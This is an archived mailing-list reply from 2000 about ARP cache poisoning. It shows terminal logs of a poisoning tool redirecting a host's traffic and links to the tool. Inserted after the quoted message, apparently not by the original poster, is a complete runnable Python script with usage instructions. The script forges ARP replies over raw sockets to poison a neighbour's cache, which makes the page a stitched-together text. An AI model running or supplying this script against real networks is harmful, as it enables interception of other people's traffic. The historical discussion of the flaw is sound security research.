Vulnerability Development mailing list archives
Re: More on ARP cache poisoning
From: ulandron () UNDERSEC COM (ulan)
Date: Wed, 2 Feb 2000 15:05:59 +0100
First of all, greetings; this is my first post to this list.

Last summer I was very interested in the subject, because a friend of mine told me that he got one of the first cable-modem internet connections in Spain, with a provider called Telecable. It was impossible to put that modem in promiscuous mode, so I wrote a little tool that, combined with IP aliasing, allowed us to redirect most of the traffic through his host. It worked against any sort of Windows, OpenBSD 2.5 and various Linux versions.

Example (hostnames removed):

# uname -a
OpenBSD black 2.5 Black#1 i386
# arp -a
(192.168.1.2) at 52:54:ab:dd:45:78
#
From 192.168.1.2:
Boot:~ # arp-fun -i eth0 -s 192.168.1.1 -d 192.168.1.3 -a FE:45:32:FA:3A:0E
Sent a 42 byte ARP request looking for the MAC of 192.168.1.3.
Waiting for a response...
Got target hardware address: 0:50:4:39:5a:5d
Everything fine, 'til now. Let's build the packet
Packet sent, memory freed, link closed; see ya!

Back to "Black":

# arp -a
(192.168.1.1) at fe:45:32:fa:3a:e
(192.168.1.2) at 52:54:ab:dd:45:78
#

Back to 192.168.1.2:

Boot:~ # arp-fun -i eth0 -s 192.168.1.1 -d 192.168.1.3 -a FE:FE:FE:FE:FE:FE
Sent a 42 byte ARP request looking for the MAC of 192.168.1.3.
Waiting for a response...
Got target hardware address: 0:50:4:39:5a:5d
Everything fine, 'til now. Let's build the packet
Packet sent, memory freed, link closed; see ya!
Boot:~ #

After, returning to black:

# arp -a
(192.168.1.1) at fe:fe:fe:fe:fe:fe
(192.168.1.2) at 52:54:ab:dd:45:78
#

Then set up an alias for 192.168.1.1 with your own MAC....

The tool can be found at http://undersec.com/members/ulandron/index.shtml.

And, one last thing: excuse me if my English or my logic has any mistakes.

Regards,
ulandron

On Tue, 1 Feb 2000, Clifford, Shawn A wrote:
> I tried to see if it would be possible to poison the ARP cache of my machine
> (Solaris 2.6) so that it contained an Ether address of a local machine, but
> the IP address of a machine outside my network (prep.ai.mit.edu, for example).
> It didn't work. Not with the 'poink' program nor with 'arp -s <host> <ether>'.
> The ARP cache in Solaris anyway is smart enough to not take entries for remote
> networks. Maybe someone else can try on Linux and other platforms. I will try
> under HP-sUX when I get a chance.
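The two steps the log above shows, learning the target's MAC with an ordinary ARP request and then sending it a forged ARP packet that maps 192.168.1.1 to an attacker-chosen MAC, as an added example in Python. This is not arp-fun's code (the post only links to it); it assumes a Linux AF_PACKET raw socket, a hypothetical interface name such as eth0, and that the forged packet is an ARP reply (the post does not say which opcode arp-fun builds; a request carrying the same spoofed sender fields poisons most stacks just as well). The frame builder and parser are pure functions so they can be checked without root; only resolve() and the main block touch the wire.

```python
"""Forge an ARP packet to poison a neighbour's cache (added example, not arp-fun)."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST = 1
ARP_REPLY = 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa


def mac_bytes(mac):
    """'fe:45:32:fa:3a:0e' -> 6 bytes; accepts the BSD-style short octets '0:50:4:39:5a:5d'."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError("bad MAC: %r" % mac)
    return bytes(int(p, 16) for p in parts)


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=None):
    """Ethernet header (14 bytes) + ARP (28 bytes) = the 42-byte frame the post's log reports."""
    if dst_mac is None:
        dst_mac = BROADCAST if op == ARP_REQUEST else target_mac
    eth = struct.pack("!6s6sH", mac_bytes(dst_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT,
                      1,            # hardware type: Ethernet
                      0x0800,       # protocol type: IPv4
                      6, 4,         # hardware / protocol address lengths
                      op,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame as a dict, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return {"op": op,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def poison_frame(victim_ip, fake_mac, target_mac, target_ip):
    """Step 2 of the post: tell target_ip that victim_ip lives at fake_mac (unicast ARP reply)."""
    return build_arp(ARP_REPLY, fake_mac, victim_ip, target_mac, target_ip)


def resolve(iface, my_mac, my_ip, target_ip, timeout=2.0):
    """Step 1 of the post: broadcast who-has target_ip and return its MAC. Needs root on Linux."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    s.bind((iface, 0))
    s.settimeout(timeout)
    s.send(build_arp(ARP_REQUEST, my_mac, my_ip, "00:00:00:00:00:00", target_ip))
    while True:                      # socket.timeout propagates if nobody answers
        fields = parse_arp(s.recv(65535))
        if fields and fields["op"] == ARP_REPLY and fields["sender_ip"] == target_ip:
            return fields["sender_mac"]


if __name__ == "__main__":
    import sys
    # Usage (hypothetical values): sudo python3 arpfun.py eth0 52:54:ab:dd:45:78 192.168.1.2 \
    #     192.168.1.1 192.168.1.3 fe:45:32:fa:3a:0e
    iface, my_mac, my_ip, victim_ip, target_ip, fake_mac = sys.argv[1:7]
    target_mac = resolve(iface, my_mac, my_ip, target_ip)
    print("Got target hardware address:", target_mac)
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    s.bind((iface, 0))
    s.send(poison_frame(victim_ip, fake_mac, target_mac, target_ip))
    s.close()
    print("Packet sent; check 'arp -a' on", target_ip)
```

The forged frame is sent unicast to the MAC learned in step 1, so only the one target sees it, which is why each run of arp-fun in the log changes only "Black"'s view of 192.168.1.1. Note that the spoofed sender IP has to be on the target's own subnet: the quoted Solaris observation that off-network entries are refused applies to forged packets just as it does to arp -s.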
Current thread:
- More on ARP cache poisoning Clifford, Shawn A (Feb 01)
- Re: More on ARP cache poisoning Forrest W. Christian (Feb 01)
- Re: More on ARP cache poisoning Sebastian (Feb 02)
- Re: More on ARP cache poisoning Granquist, Lamont (Feb 03)
- Re: More on ARP cache poisoning ulan (Feb 02)
- <Possible follow-ups>
- Re: More on ARP cache poisoning Clifford, Shawn A (Feb 01)
- Re: More on ARP cache poisoning Dug Song (Feb 01)
- Re: More on ARP cache poisoning Mudge (Feb 03)
- no comment Michal Zalewski (Feb 02)
- Re: no comment Michal Zalewski (Feb 02)
- Re: More on ARP cache poisoning Dug Song (Feb 01)
- Re: More on ARP cache poisoning Bryce Walter (Feb 02)
- Re: More on ARP cache poisoning Ron Parker (Feb 03)